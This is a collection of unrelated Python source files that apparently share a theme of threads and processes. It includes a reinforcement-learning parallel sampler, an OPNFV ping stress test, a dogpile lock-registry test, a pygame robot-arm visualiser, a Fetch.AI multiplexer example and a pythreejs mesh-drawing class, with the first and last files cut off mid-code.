self._agent_init(agent, env.spaces, global_B=global_B,
env_ranks=env_ranks)
examples = self._build_buffers(self.EnvCls, self.env_kwargs, bootstrap_value)
self._build_parallel_ctrl(n_worker)
if traj_info_kwargs:
for k, v in traj_info_kwargs.items():
setattr(self.TrajInfoCls, "_" + k, v) # Avoid passing every init.
common_kwargs = self._assemble_common_kwargs(affinity, global_B)
workers_kwargs = self._assemble_workers_kwargs(affinity, seed, n_envs_list)
target = sampling_process if worker_process is None else worker_process
self.workers = [mp.Process(target=target,
kwargs=dict(common_kwargs=common_kwargs, worker_kwargs=w_kwargs))
for w_kwargs in workers_kwargs]
for w in self.workers:
w.start()
self.ctrl.barrier_out.wait() # Wait for workers ready (e.g. decorrelate).
return examples # e.g. In case useful to build replay buffer.
def obtain_samples(self, itr):
self.ctrl.itr.value = itr
self.ctrl.barrier_in.wait()
# Workers step environments and sample actions here.
self.ctrl.barrier_out.wait()
traj_infos = drain_queue(self.traj_infos_queue)
return self.samples_pyt, traj_infos
def evaluate_agent(self, itr):
self.ctrl.itr.value = itr
self.ctrl.do_eval.value = True
self.sync.stop_eval.value = False
self.ctrl.barrier_in.wait()
traj_infos = list()
if self.eval_max_trajectories is not None:
while True:
time.sleep(EVAL_TRAJ_CHECK)
traj_infos.extend(drain_queue(self.eval_traj_infos_queue,
guard_sentinel=True))
if len(traj_infos) >= self.eval_max_trajectories:
self.sync.stop_eval.value = True
logger.log("Evaluation reached max num trajectories "
f"({self.eval_max_trajectories}).")
break # Stop possibly before workers reach max_T.
if self.ctrl.barrier_out.parties - self.ctrl.barrier_out.n_waiting == 1:
logger.log("Evaluation reached max num time steps "
f"({self.eval_max_T}).")
break # Workers reached max_T.
self.ctrl.barrier_out.wait()
traj_infos.extend(drain_queue(self.eval_traj_infos_queue,
n_sentinel=self.n_worker))
self.ctrl.do_eval.value = False
return traj_infos
def shutdown(self):
self.ctrl.quit.value = True
self.ctrl.barrier_in.wait()
for w in self.workers:
w.join()
######################################
# Helpers
######################################
def _get_env_spaces(self, EnvCls, env_kwargs):
def get_spaces(EnvCls, env_kwargs, examples):
env = EnvCls(**env_kwargs)
examples['spaces'] = env.spaces
mgr = mp.Manager()
examples = mgr.dict()
w = mp.Process(target=get_spaces, args=(EnvCls, env_kwargs, examples))
w.start()
w.join()
return examples['spaces']
def _get_n_envs_list(self, affinity=None, n_worker=None, B=None):
B = self.batch_spec.B if B is None else B
n_worker = len(affinity["workers_cpus"]) if n_worker is None else n_worker
if B < n_worker:
logger.log(f"WARNING: requested fewer envs ({B}) than available worker "
f"processes ({n_worker}). Using fewer workers (but maybe better to "
"increase sampler's `batch_B`.")
n_worker = B
n_envs_list = [B // n_worker] * n_worker
if not B % n_worker == 0:
logger.log("WARNING: unequal number of envs per process, from "
f"batch_B {self.batch_spec.B} and n_worker {n_worker} "
"(possible suboptimal speed).")
for b in range(B % n_worker):
n_envs_list[b] += 1
return n_envs_list
def _agent_init(self, agent, env_spaces, global_B=1, env_ranks=None):
agent.initialize(env_spaces, share_memory=True,
global_B=global_B, env_ranks=env_ranks)
self.agent = agent
def _build_buffers(self, EnvCls, env_kwargs, bootstrap_value):
self.samples_pyt, self.samples_np, examples = build_samples_buffer(
self.agent, EnvCls, env_kwargs, self.batch_spec, bootstrap_value,
agent_shared=True, env_shared=True, subprocess=True)
return examples
def _build_parallel_ctrl(self, n_worker):
self.ctrl = AttrDict(
quit=mp.RawValue(ctypes.c_bool, False),
barrier_in=mp.Barrier(n_worker + 1),
barrier_out=mp.Barrier(n_worker + 1),
do_eval=mp.RawValue(ctypes.c_bool, False),
itr=mp.RawValue(ctypes.c_long, 0),
)
self.traj_infos_queue = mp.Queue()
self.eval_traj_infos_queue = mp.Queue()
self.sync = AttrDict(stop_eval=mp.RawValue(ctypes.c_bool, False))
def _assemble_common_kwargs(self, affinity, global_B=1):
common_kwargs = dict(
EnvCls=self.EnvCls,
env_kwargs=self.env_kwargs,
agent=self.agent,
batch_T=self.batch_spec.T,
CollectorCls=self.CollectorCls,
TrajInfoCls=self.TrajInfoCls,
traj_infos_queue=self.traj_infos_queue,
ctrl=self.ctrl,
max_decorrelation_steps=self.max_decorrelation_steps,
torch_threads=affinity.get("worker_torch_threads", 1),
global_B=global_B,
)
if self.eval_n_envs > 0:
common_kwargs.update(dict(
eval_n_envs=self.eval_n_envs_per,
eval_CollectorCls=self.eval_CollectorCls,
eval_env_kwargs=self.eval_env_kwargs,
eval_max_T=self.eval_max_T,
eval_traj_infos_queue=self.eval_traj_infos_queue,
)
)
return common_kwargs
def _assemble_workers_kwargs(self, affinity, seed, n_envs_list):
workers_kwargs = list()
i_env = 0
g_env = sum(n_envs_list) * self.rank
for rank in range(len(n_envs_list)):
n_envs = n_envs_list[rank]
slice_B = slice(i_env, i_env + n_envs)
env_ranks = list(range(g_env, g_env + n_envs))
worker_kwargs = dict(
rank=rank,
env_ranks=env_ranks,
seed=seed + rank,
cpus=(affinity["workers_cpus"][rank]
if affinity.get("set_affinity", True) else None),
n_envs=n_envs,
samples_np=self.samples_np[:, slice_B],
sync=self.sync, # Only for eval, on CPU.
)
i_env += n_envs
g_env += n_envs
workers_kwargs.append(worker_kwargs)
return workers_kwargs
|
posca_factor_ping.py
|
#!/usr/bin/env python
##############################################################################
# Copyright (c) 2017 Huawei Technologies Co.,Ltd and others.
#
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the Apache License, Version 2.0
# which accompanies this distribution, and is available at
# http://www.apache.org/licenses/LICENSE-2.0
##############################################################################
'''This file realize the function of run posca ping stress test script
This file contain several part:
Frist is create a script to realize several threading run'''
import utils.logger as log
import uuid
import json
import os
import sys
import time
import threading
import datetime
import Queue
from utils.parser import Parser as conf_parser
import utils.env_prepare.quota_prepare as quota_prepare
import utils.env_prepare.stack_prepare as stack_prepare
import utils.infra_setup.runner.yardstick as runner_yardstick
import testsuites.posca.testcase_dashboard.posca_stress_ping as DashBoard
import utils.infra_setup.runner.docker_env as docker_env
# --------------------------------------------------
# logging configuration
# --------------------------------------------------
LOG = log.Logger(__name__).getLogger()
test_dict = {
"action": "runTestCase",
"args": {
"opts": {
"task-args": {}
},
"testcase": "ping_bottlenecks"
}
}
testfile = os.path.basename(__file__)
testcase, file_format = os.path.splitext(testfile)
cidr = "/home/opnfv/repos/yardstick/samples/ping_bottlenecks.yaml"
runner_DEBUG = True
q = Queue.Queue()
def env_pre(test_config):
test_yardstick = False
if "yardstick" in test_config["contexts"].keys():
test_yardstick = True
stack_prepare._prepare_env_daemon(test_yardstick)
quota_prepare.quota_env_prepare()
LOG.info("yardstick environment prepare!")
if(test_config["contexts"]['yardstick_envpre']):
stdout = runner_yardstick.yardstick_image_prepare()
LOG.debug(stdout)
def do_test():
func_name = sys._getframe().f_code.co_name
out_file = ("/tmp/yardstick_" + str(uuid.uuid4()) + ".out")
parameter_info = {}
yardstick_container = docker_env.yardstick_info['container']
cmd = runner_yardstick.yardstick_command_parser(debug=runner_DEBUG,
cidr=cidr,
outfile=out_file,
parameter=parameter_info)
stdout = docker_env.docker_exec_cmd(yardstick_container, cmd)
LOG.info(stdout)
out_value = 0
loop_value = 0
while loop_value < 60:
time.sleep(2)
loop_value = loop_value + 1
with open(out_file) as f:
data = json.load(f)
if data["result"]["criteria"] == "PASS":
LOG.info("yardstick run success")
out_value = 1
break
else:
LOG.error("yardstick error exit")
out_value = 0
break
q.put((out_value, func_name))
return out_value
def config_to_result(num, out_num, during_date, result):
testdata = {}
test_result = {}
test_result["number_of_stacks"] = float(num)
test_result["success_times"] = out_num
test_result["success_rate"] = out_num / num
test_result["duration_time"] = during_date
test_result["result"] = result
testdata["data_body"] = test_result
testdata["testcase"] = testcase
return testdata
def func_run(condic):
test_date = do_test()
return test_date
def run(test_config):
con_dic = test_config["load_manager"]
test_num = con_dic['scenarios']['num_stack'].split(',')
if test_config["contexts"]["yardstick_ip"] is None:
con_dic["contexts"]["yardstick_ip"] =\
conf_parser.ip_parser("yardstick_test_ip")
if "dashboard" in test_config["contexts"].keys():
if test_config["contexts"]["dashboard_ip"] is None:
test_config["contexts"]["dashboard_ip"] =\
conf_parser.ip_parser("dashboard")
LOG.info("Create Dashboard data")
DashBoard.posca_stress_ping(test_config["contexts"])
env_pre(test_config)
LOG.info("yardstick environment prepare done!")
for value in test_num:
result = []
out_num = 0
num = int(value)
# pool = multiprocessing.Pool(processes=num)
threadings = []
LOG.info("begin to run %s thread" % num)
starttime = datetime.datetime.now()
for i in xrange(0, num):
temp_thread = threading.Thread(target=func_run, args=(str(i),))
threadings.append(temp_thread)
temp_thread.start()
for one_thread in threadings:
one_thread.join()
while not q.empty():
result.append(q.get())
for item in result:
out_num = out_num + float(item[0])
endtime = datetime.datetime.now()
LOG.info("%s thread success %d times" % (num, out_num))
during_date = (endtime - starttime).seconds
if out_num >= con_dic["scenarios"]['threshhold']:
criteria_result = "PASS"
else:
criteria_result = "FAIL"
data_reply = config_to_result(num, out_num, during_date,
criteria_result)
if "dashboard" in test_config["contexts"].keys():
DashBoard.dashboard_send_data(test_config['contexts'], data_reply)
conf_parser.result_to_file(data_reply, test_config["out_file"])
if criteria_result is "FAIL":
break
LOG.info('END POSCA stress ping test')
return criteria_result
|
test_nameregistry.py
|
import logging
import random
import threading
import time
from unittest import TestCase
from dogpile.util import NameRegistry
log = logging.getLogger(__name__)
class NameRegistryTest(TestCase):
def test_name_registry(self):
success = [True]
num_operations = [0]
def create(identifier):
log.debug("Creator running for id: " + identifier)
return threading.Lock()
registry = NameRegistry(create)
baton = {"beans": False, "means": False, "please": False}
def do_something(name):
for iteration in range(20):
name = list(baton)[random.randint(0, 2)]
lock = registry.get(name)
lock.acquire()
try:
if baton[name]:
success[0] = False
log.debug("Baton is already populated")
break
baton[name] = True
try:
time.sleep(random.random() * 0.01)
finally:
num_operations[0] += 1
baton[name] = False
finally:
lock.release()
log.debug("thread completed operations")
threads = []
for id_ in range(1, 20):
t = threading.Thread(target=do_something, args=("somename",))
t.start()
threads.append(t)
for t in threads:
t.join()
assert success[0]
|
simulateAndVisualizeLive.py
|
"""
Created on 2/11/20
Marquette Robotics Club
Danny Hudetz
Purpose: change the variables of the megarm live and visualize what it will look
like
"""
import numpy as math
import pygame
import matplotlib
import matplotlib.pyplot as plt
import threading
# Define some colors
BLACK = (0, 0, 0)
WHITE = (255, 255, 255)
GREEN = (0, 255, 0)
RED = (255, 0, 0)
BLUE = (0, 0, 255)
GRAY =(100, 100, 100)
LIGHTGRAY=(50,50,50)
pygame.init()
# Set the width and height of the screen [width, height]
WIDTH = 600
HEIGHT = 600
center = pygame.math.Vector2()
center.x = WIDTH/2
center.y = HEIGHT/2
screen = pygame.display.set_mode((WIDTH, HEIGHT))
pygame.display.set_caption("MegarmModel")
clock = pygame.time.Clock()
font = pygame.font.Font('freesansbold.ttf', 15)
# Loop until the user clicks the close button.
done = False
#lenghs of each arm portion
a = 31.5 #cm
b = 31.5 #cm
c = 7 #cm
#specified operation
operationHeight = 0 #cm
startAngle = 0 #deg
#graphics
scaleFactor = 2.5
lineWidth = 5
doGrid = True
doPlot = True
gridTileSize = 20 #cm
fps = 60
cyclesPerSec=.5
operationHeightStore=operationHeight
t1=t2=t3=ar=az=br=bz=cr=cz=frameCount=deg=deg2=endAngle=0
POI=[0,0]
circles=[]
points=[]
img = pygame.image.load("marquette_robotics.png")
imgScaled = pygame.transform.scale(img, (200, 66))
def changeAngles():
global endAngle, startAngle, operationHeight
if a<=abs(operationHeight):
if operationHeight>0:
operationHeight=a
print("max height reached")
else:
operationHeight=-a
print("min height reached")
if b>a and operationHeight>=0:
endAngle=180
else:
if a>b+operationHeight and a!=0:
endAngle=math.rad2deg(math.arcsin((b+operationHeight)/a))
elif a>=abs(operationHeight-b) and a!=0:
endAngle=-math.rad2deg(math.arcsin((operationHeight-b)/a))
if a+b>operationHeight>0:
endAngle=180-endAngle
startAngle = math.rad2deg(math.arcsin(operationHeight/a))
def userInputLoop():
global a,b,c,operationHeight,cyclesPerSec,done,scaleFactor,endAngle,startAngle,circles,gridTileSize
print("\nSyntax to change height to 10cm: \"z 10\"\nEnter q to quit.")
while not done:
userInput = input("What would you like to change? ")
words=userInput.split()
if len(words)==2:
circles=[]
print("Attempting adjust...")
if words[0]=="a":
a=float(words[1])
changeAngles()
elif words[0]=="b":
b=float(words[1])
changeAngles()
elif words[0]=="c":
c=float(words[1])
elif words[0]=="z":
operationHeight=float(words[1])
elif words[0]=="cps":
cyclesPerSec=float(words[1])
elif words[0]=="sa":
startAngle=float(words[1])
elif words[0]=="ea":
endAngle=float(words[1])
elif words[0]=="sf":
scaleFactor=float(words[1])
elif words[0]=="gs":
gridTileSize=float(words[1])
else:
print("Sorry, can't do that.")
elif words[0]=="q":
done=True
pygame.quit()
else:
print("Improper syntax")
def calculateAngles():
global t1,t2,t3,deg,deg2
deg += (360*cyclesPerSec)/fps
t1= -(((endAngle-startAngle)/2)*math.cos(math.deg2rad(deg)))+startAngle+(endAngle-startAngle)/2
if -1 <= (-operationHeight/b)+(a/b)*math.sin(math.deg2rad(t1)) <= 1:
t2= (math.rad2deg(math.arccos((-operationHeight/b)+(a/b)*math.sin(math.deg2rad(t1))))-t1-90)
t3=-t2-t1
calculateComponents();
#print(t1,t2,t3)
def calculateComponents():
global ar,az,br,bz,cr,cz
ta = math.deg2rad(t1)
ar = a*math.cos(ta)
az = -a*math.sin(ta)
tb = math.deg2rad(t2-270+t1)
br = b*math.sin(tb)
bz = b*math.cos(tb)
tc = math.deg2rad(t3-(90-(t2-180+t1)))
cr = c*math.sin(tc)
cz = c*math.cos(tc)
def overlay(t, x, y, color):
text = font.render(t, True, color, BLACK)
textRect = text.get_rect()
textRect.center = (x, y)
screen.blit(text, textRect)
def drawGrid():
for i in range(0,int(WIDTH/(scaleFactor*gridTileSize*2))+1):
gridRight = int(i*(scaleFactor*gridTileSize))+center.x
gridLeft = center.x-int(i*(scaleFactor*gridTileSize))
pygame.draw.line(screen, LIGHTGRAY, (gridRight, 0), (gridRight, HEIGHT), 1)
pygame.draw.line(screen, LIGHTGRAY, (gridLeft, 0), (gridLeft, HEIGHT), 1)
for j in range(0,int(HEIGHT/(scaleFactor*gridTileSize*2))+1):
gridDown = int(j*(scaleFactor*gridTileSize))+center.y
gridUp = center.y-int(j*(scaleFactor*gridTileSize))
pygame.draw.line(screen, LIGHTGRAY, (0, gridUp), (WIDTH, gridUp), 1)
pygame.draw.line(screen, LIGHTGRAY, (0, gridDown), (WIDTH, gridDown), 1)
try:
userThread = threading.Thread(target=userInputLoop, args=())
userThread.start()
except:
print("Error: unable to start thread")
changeAngles()
goingUp = True
while not done:
# --- Main event loop
for event in pygame.event.get():
if event.type == pygame.QUIT:
done = True
frameCount+=1
if operationHeightStore!=operationHeight:
changeAngles()
operationHeightStore = operationHeight
calculateAngles()
screen.fill(BLACK)
avector = pygame.math.Vector2()
avector.x = ar*scaleFactor
avector.y = az*scaleFactor
bvector = pygame.math.Vector2()
bvector.x = br*scaleFactor
bvector.y = bz*scaleFactor
cvector = pygame.math.Vector2()
cvector.x = cr*scaleFactor
cvector.y = cz*scaleFactor
POI = center+avector+bvector+cvector
for cir in circles:
pygame.draw.circle(screen, GRAY, [int(cir.x),int(cir.y)], 1)
if doGrid:
drawGrid()
#if frameCount<fps/cyclesPerSec:
# if frameCount<1000:
# circles.append(POI)
# circles.append(center+avector)
pygame.draw.line(screen, RED, center, center+avector, lineWidth)
pygame.draw.line(screen, GREEN, center+avector, center+avector+bvector, lineWidth)
pygame.draw.line(screen, BLUE, center+avector+bvector, POI, lineWidth)
#pygame.draw.line(screen, GRAY, center, POI, 1)
pygame.draw.circle(screen, WHITE, [int(POI.x),int(POI.y)], 3)
pygame.draw.circle(screen, WHITE, [int(center.x),int(center.y)], 3)
pygame.draw.circle(screen, WHITE, [int((center+avector).x),int((center+avector).y)], 3)
pygame.draw.circle(screen, WHITE, [int((center+avector+bvector).x),int((center+avector+bvector).y)], 3)
finalRadius = (POI.x-center.x)/scaleFactor
finalHeight = -(POI.y-center.y)/scaleFactor
overlay("Grid tile is "+str(gridTileSize)+"cm by "+str(gridTileSize)+"cm", 100, 30, WHITE)
overlay("Radius: " + str(int(finalRadius)) + "cm", 100, 50, WHITE)
overlay("Height: " + str(int(finalHeight)) + "cm", 100, 70, WHITE)
overlay("Angle 1: " + str(int(t1)) + "deg", 100, 90, RED)
overlay("Angle 2: " + str(int(t2)) + "deg", 100, 110, GREEN)
overlay("Angle 3: " + str(int(t3)) + "deg", 100, 130, BLUE)
# print("t", t1, " r", finalRadius)
if (-1 <= (-operationHeight/b)+(a/b)*math.cos(math.deg2rad(90-t1)) <= 1) and doPlot:
points.append((finalRadius,t1))
screen.blit(imgScaled, (WIDTH-200, 0))
pygame.display.update()
clock.tick(fps)
if doPlot:
angles=[]
radii=[]
fig, ax = plt.subplots()
for p in points:
while(p[0]>360):
p=(p[0]-360,p[1])
angles.append(p[0])
radii.append(p[1])
ax.scatter(angles, radii)
ax.set(xlabel='radii (cm)', ylabel='angles (deg)',
title='Megarm Motion')
ax.grid()
fig.savefig("output.png")
plt.show()
pygame.quit()
|
test2.py
|
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
#http://cuiqingcai.com/3335.html
import multiprocessing
import time
def process(num):
time.sleep(num)
print ('Process:', num)
if __name__ == '__main__':
for i in range(5):
p = multiprocessing.Process(target=process, args=(i,))
p.start()
print('CPU number:' + str(multiprocessing.cpu_count()))
for p in multiprocessing.active_children():
print('Child process name: ' + p.name + ' id: ' + str(p.pid))
print('Process Ended')
|
multiplexer_standalone.py
|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This module contains the full script from the multiplexer-standalone.md file."""
import os
import time
from copy import copy
from threading import Thread
from typing import Optional
from aea.connections.stub.connection import StubConnection
from aea.mail.base import Envelope, Multiplexer
INPUT_FILE = "input.txt"
OUTPUT_FILE = "output.txt"
def run():
# Ensure the input and output files do not exist initially
if os.path.isfile(INPUT_FILE):
os.remove(INPUT_FILE)
if os.path.isfile(OUTPUT_FILE):
os.remove(OUTPUT_FILE)
# create the connection and multiplexer objects
stub_connection = StubConnection(
input_file_path=INPUT_FILE, output_file_path=OUTPUT_FILE
)
multiplexer = Multiplexer([stub_connection])
try:
# Set the multiplexer running in a different thread
t = Thread(target=multiplexer.connect)
t.start()
# Wait for everything to start up
time.sleep(3)
# Create a message inside an envelope and get the stub connection to pass it into the multiplexer
message_text = (
"multiplexer,some_agent,fetchai/default:0.1.0,\x08\x01*\x07\n\x05hello,"
)
with open(INPUT_FILE, "w") as f:
f.write(message_text)
# Wait for the envelope to get processed
time.sleep(2)
# get the envelope
envelope = multiplexer.get() # type: Optional[Envelope]
assert envelope is not None
# Inspect its contents
print(
"Envelope received by Multiplexer: sender={}, to={}, protocol_id={}, message={}".format(
envelope.sender, envelope.to, envelope.protocol_id, envelope.message
)
)
# Create a mirrored response envelope
response_envelope = copy(envelope)
response_envelope.to = envelope.sender
response_envelope.sender = envelope.to
# Send the envelope back
multiplexer.put(response_envelope)
# Read the output envelope generated by the multiplexer
with open(OUTPUT_FILE, "r") as f:
print("Envelope received from Multiplexer: " + f.readline())
finally:
# Shut down the multiplexer
multiplexer.disconnect()
t.join()
if __name__ == "__main__":
run()
|
DrawableMesh.py
|
import pythreejs as three
import numpy as np
from time import time, sleep
from .Colors import colors
from ..utils import Observer, ColorMap
import threading
import copy
import math
import re
class DrawableMesh (Observer):
def __init__(self, geometry, mesh_color = None, reactive = False):
super(DrawableMesh, self).__init__()
self._external_color = colors.teal
self._internal_color = colors.orange
self._color_map = None
self._metric_string = None
self._c_map_string = None
self._label_colors = None
self.texture = geometry.texture
self.faceVertexUvs = []
self.geometry = geometry
self.type = str(type(self.geometry))
if reactive:
self.geometry.attach(self)
#Methods for initializing meshes' attributes (color, mesh, wireframe, threeks_items, flags like: updating and queue)
self.geometry_color = self.__initialize_geometry_color(mesh_color)
self.mesh = self.__initialize_mesh()
##reminder. wireframe is when the object is projected into screen space and rendered by drawing lines at the location of each edge.
self.wireframe = self.__initialize_wireframe()
self.threejs_items = [self.mesh, self.wireframe]
self.updating = False
self.queue = False
def __initialize_geometry_color(self, mesh_color, geometry = None):
if geometry is None:
geometry = self.geometry
if mesh_color is None:
#External color is teal, initialized in __init__ and represented with a numpy array 1x3
color = np.repeat(self._external_color.reshape(1, 3), geometry.num_triangles*3, axis=0)
# This condition is for initializing the color of the internal part of volumetric meshes
if self.geometry.mesh_is_volumetric:
internal_color = geometry.internal_triangles_idx()
color[internal_color] = self._internal_color
else:
mesh_color = np.array(mesh_color, dtype=np.float)/255
color = np.repeat(mesh_color.reshape(1,3), geometry.num_triangles*3, axis=0)
self._external_color = mesh_color
return color
def update_wireframe_color(self, new_color):
self.wireframe.material.color = new_color
def update_wireframe_opacity(self, new_opacity):
self.wireframe.material.opacity = new_opacity
def update_internal_color(self, new_color, geometry = None):
if geometry is None:
geometry = self.geometry
self._internal_color = np.array(new_color)
# This condition is for updating the color of the internal part of volumetric meshes
if hasattr(geometry, "internals"):
internal_color = geometry.internal_triangles_idx()
self.geometry_color[internal_color] = new_color
#_as_threejs_colors has been recalled without passing nothing, it returns true
colors = geometry._as_threejs_colors()
new_colors = self.geometry_color[colors]
tris, vtx_normals = geometry._as_threejs_triangle_soup()
interleaved = np.concatenate((tris, new_colors, vtx_normals), axis=1).astype(np.float32)
#interleaved is made up of the triangle soup, the new colors and the normals of this vertices
self.mesh.geometry.attributes['color'].data.array = interleaved
def update_poly_color(self, new_color, poly_index, num_triangles=None, geometry=None):
if geometry is None:
geometry = self.geometry
if num_triangles is None:
if "Quadmesh" in str(type(self.geometry)):
num_triangles = 2
elif "Tetmesh" in str(type(self.geometry)):
num_triangles = 4
elif "Hexmesh" in str(type(self.geometry)):
num_triangles = 12
else:
num_triangles = 1
start = poly_index*num_triangles*3
end = start+num_triangles*3
indices = np.arange(start, end);
self.geometry_color[indices] = new_color
colors = geometry._as_threejs_colors()
new_colors = self.geometry_color[colors].astype(np.float32)
tris, vtx_normals = geometry._as_threejs_triangle_soup()
interleaved = np.c_[tris, new_colors, vtx_normals].astype(np.float32)
self.mesh.geometry.attributes['color'].data.array = interleaved
def update_external_color(self, new_color, geometry = None):
if geometry is None:
geometry = self.geometry
self._external_color = np.array(new_color)
#This condition is for initializing the color of the external part of volumetric meshes
if hasattr(geometry, "internals"):
internal_color = geometry.internal_triangles_idx()
self.geometry_color[np.logical_not(internal_color)] = new_color
else:
self.geometry_color[:] = new_color
colors = geometry._as_threejs_colors()
new_colors = self.geometry_color[colors]
tris, vtx_normals = geometry._as_threejs_triangle_soup()
if len(self.geometry.material) > 0 or self.texture is not None:
interleaved = np.concatenate((tris, new_colors, vtx_normals, self.geometry.uvcoords), axis=1).astype(np.float32)
else:
interleaved = np.concatenate((tris, new_colors, vtx_normals), axis=1).astype(np.float32)
self.mesh.geometry.attributes['color'].data.array = interleaved
def update_color_map(self, new_colors, geometry = None):
if geometry is None:
geometry = self.geometry
self.geometry_color[:] = geometry._as_threejs_colors(colors = new_colors)
colors = geometry._as_threejs_colors()
new_colors = self.geometry_color[colors]
tris, vtx_normals = geometry._as_threejs_triangle_soup()
if(tris.shape != new_colors.shape):
return
if len(self.geometry.material) > 0 or self.texture is not None:
interleaved = np.concatenate((tris, new_colors, vtx_normals, self.faceVertexUvs), axis=1).astype(np.float32)
else:
interleaved = np.concatenate((tris, new_colors, vtx_normals), axis=1).astype(np.float32)
self.mesh.geometry.attributes['color'].data.array = interleaved
def compute_color_map(self, metric_string, c_map_string, geometry=None):
if geometry is None:
geometry = self.geometry
self._metric_string = metric_string
self._c_map_string = c_map_string
#simplex metrics is a dictionary inherited by Abstract Mesh
#[propertyName : ((min, max), npArray (Nx1))]
(min_range, max_range), metric = self.geometry.simplex_metrics[metric_string]
#virdis, parula, jet or red_blue
c_map = ColorMap.color_maps[c_map_string]
if min_range is None or max_range is None:
min_range = np.min(metric)
max_range = np.max(metric)
#ptp = peak to peak "Range of values (maximum - minimum) along an axis"
if (np.abs(max_range-min_range) > 1e-7):
normalized_metric = ((metric - np.min(metric))/np.ptp(metric)) * (c_map.shape[0]-1)
else:
normalized_metric = np.repeat(np.mean(metric), metric.shape[0])
else:
#Clip (limit) the values in an array.
#Given an interval, values outside the interval are clipped to the interval edges.
#ex. a = [0,1,2,3,4,5,6,7] clip(a, 1, 5) a = [1,1,2,3,4,5,5,5]
normalized_metric = np.clip(metric, min_range, max_range)
normalized_metric = (normalized_metric - min_range)/(max_range-min_range) * (c_map.shape[0]-1)
normalized_metric = 1-normalized_metric
#rint round elements to the nearest integer number
metric_to_colormap = np.rint(normalized_metric).astype(np.int)
mesh_color = c_map[metric_to_colormap]
self._color_map = mesh_color
self.update_color_map(mesh_color, geometry)
def update_color_label(self, geometry = None):
if geometry is None:
geometry = self.geometry
mesh_color = np.zeros((geometry.num_polys,3), dtype=np.float)
for idx, value in enumerate(self.geometry.labels):
if(int(value) not in self._label_colors):
self._label_colors[int(value)] = colors.random_color()
mesh_color[idx] = self._label_colors[int(value)]
self._color_map = mesh_color
self.update_color_map(mesh_color)
def __initialize_wireframe(self):
#LineBasicMaterial: A material for drawing wireframe-style geometries
edges_material = three.LineBasicMaterial(color='#686868',
linewidth = 1,
depthTest=True,
opacity=.2,
transparent=True)
wireframe = self.__get_wireframe_from_boundary()
return three.LineSegments(wireframe, material = edges_material)
def __get_drawable_from_boundary(self):
geometry_attributes = {}
tris, vtx_normals = self.geometry._as_threejs_triangle_soup()
new_colors = self.geometry_color[self.geometry._as_threejs_colors()].astype(np.float32)
if self.geometry.uvcoords is not None:
uvcoords = self.geometry.uvcoords.astype(np.float32)
coor = self.geometry.coor
uv = []
if len(uvcoords) != 0:
#corrispondenza delle coordinate uv in triangle soup
#Uv coords in triangle soup
if 'Quadmesh' in self.type:
coor = np.c_[coor[:,:3], coor[:,2:], coor[:,0]]
coor = coor.flatten()
for c in coor:
uv.append(uvcoords[c - 1])
self.faceVertexUvs = np.array(uv).astype(np.float32)
if len(self.faceVertexUvs) != 0 :
interleaved_array = np.concatenate((tris, new_colors, vtx_normals, self.faceVertexUvs), axis=1)
buffer = three.InterleavedBuffer(array=interleaved_array, stride=4)
else:
interleaved_array = np.concatenate((tris, new_colors, vtx_normals), axis=1)
buffer = three.InterleavedBuffer(array=interleaved_array, stride=3)
#Making the interleavedBuffer using the interleaved_array made up of the triangle soup, the color and the vertices' normals, with a stride of 3
#itemsize = item size, dynamic = (is the normalized attribute o f the super class)?, offset = it's the offset from the start item,
geometry_attributes['position'] = three.InterleavedBufferAttribute(data=buffer, itemSize=3, dynamic = True)
geometry_attributes['color'] = three.InterleavedBufferAttribute(data=buffer, itemSize=3, offset=3, dynamic=True)
geometry_attributes['normal'] = three.InterleavedBufferAttribute(data=buffer, itemSize=3, offset=6, dynamic=True)
if self.geometry.material is not {} or self.geometry.texture is not None :
geometry_attributes['uv'] = three.InterleavedBufferAttribute(data=buffer, itemSize=2, offset=9, dynamic=True)
# # Buffer Geometry = an efficient representation of mesh, line, or point geometry
# Includes vertex positions, face indices, normals, colors, UVs, and custom attributes within buffers
drawable_geometry = three.BufferGeometry(attributes=geometry_attributes)
#The multiplier is used because groups need faces' indices in triangle soup and 'count' counts only the number of faces per material
mult = 1
if 'Trimesh' in self.type:
mult = 3
elif 'Quadmesh' in self.type:
mult = 6
if len(self.geometry.material) != 0:
'''
group = { start: Integer, count: Integer, materialIndex: Integer } where:
- start : the first triangle index of the group
- count : how many indices are included
- materialIndex : the material array index to use for this group
'''
i = 0
for g in self.geometry.groups:
if i == 0:
n = copy.copy(g)
drawable_geometry.exec_three_obj_method("addGroup", 0, mult * self.geometry.groups[g], self.search_key(g))
else:
drawable_geometry.exec_three_obj_method("addGroup", mult * self.geometry.groups[n], mult * self.geometry.groups[g],
self.search_key(g))
n = copy.copy(g)
i = i + 1
return drawable_geometry
# Search key returns the position of the group corresponding the position of the material in the material array
def search_key(self, s):
i = 0
for k in self.geometry.material.keys():
if s == k:
return i
i = i + 1
def __as_buffer_attr(self, array):
#BufferAttribute stores data for an attribute (such as vertex positions, face indices etc) associated with a BufferGeometry,
return three.BufferAttribute(array, normalized = False, dynamic = True)
def __get_wireframe_from_boundary(self):
#edges in the boundary box
edges = self.geometry.vertices[self.geometry.as_edges_flat()].astype(np.float32)
#The function empty returns an array without values initialized
buffer = np.empty((int(edges.shape[0] * 3), 3), dtype=np.float32).reshape(-1, 3)
buffer[:edges.shape[0]] = edges
vertices = self.__as_buffer_attr(buffer)
wireframe = three.BufferGeometry(attributes={'position': vertices})
#Excute the method specified by `method_name` on the three object, with arguments `args`
#SetDrawRange is a function that sets the attribute DrawRange which determines the part of the geometry to render. (start, end)
wireframe.exec_three_obj_method("setDrawRange", 0, edges.shape[0])
return wireframe
def getTexture(self, filename):
tex = None
if filename is not None:
tex = three.ImageTexture(filename)
return tex
def color (self, array):
#From rgb (0 to 1) to rgb (0 to 255) and from rgb (0 to 255) to html color
r = (int)(array[0] * 255.999)
g = (int)(array[1] * 255.999)
b = (int)(array[2] * 255.999)
return '#%02x%02x%02x' % (r, g, b)
def __initialize_mesh(self):
drawable_geometry = self.__get_drawable_from_boundary()
